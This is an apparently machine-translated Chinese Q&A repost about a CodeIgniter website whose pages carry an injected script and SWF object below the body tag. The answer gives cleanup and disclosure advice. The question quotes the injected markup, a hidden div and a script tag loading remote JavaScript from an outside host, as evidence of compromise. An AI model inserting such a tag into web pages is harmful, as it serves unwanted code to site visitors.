3周前,我在3周后出现了一个奇怪的脚本,该脚本在body标签下出现,现在使我的网站上线。事情是,它没有插入代码中,所以我无法删除它。我经营一个Codeigniter网站。事情是我所有的权限都在777上。我对其进行了更改,但仍在body标签下添加了脚本和SWF对象。
swf和添加的脚本。
<div id="dp_swf_engine" style="position: absolute; width: 1px; height: 1px;">
</body>
<script src="http://i.spigotjs.info/opt_1398856699078/opt_content.js?partner=spig&channel=spigFF&appTitle=" type="application/x-javascript">
</html>
在几个地方可以插入这样的脚本:
破解者可能已访问您的服务器并修改了源。将软件下载到另一台计算机上,并将其与版本控制系统中的最新版本进行比较。不使用版本控制吗?立即开始。
由于该代码是加密的,因此通常很难找到。因此,您确实需要检查每一行代码。
破解者可能已在服务器上安装了过滤器或前端。这意味着请求被其他一些软件拦截,发送到您的代码进行处理,然后进行修改。
我不知道有哪些木马可以这样做,但是从理论上讲,他们可以安装新的系统库或内核模块来进行这种过滤,因此很难找到它们。如果是这种情况,请擦拭服务器并从干净的源安装所有组件。
您是否也为其他站点获得了相同的脚本?然后,您的本地浏览器可能已被感染。
尝试安装其他浏览器并更新您的防病毒软件。
如果您使用Google网站管理员工具,则Google会对您的网站进行病毒检查。如果他们发现了什么,您将在仪表板上收到警告。
重要提示:如果您的服务器受到污染,则需要将此信息告知访客。如果您有他们的电子邮件地址,请向他们发送电子邮件,告诉他们有关事件以及如何清洁他们的计算机。
您还应该在首页上贴上一个大字警告,以提醒经常访问的访问者。
本文收集自互联网,转载请注明来源。
如有侵权,请联系 [email protected] 删除。
我来说两句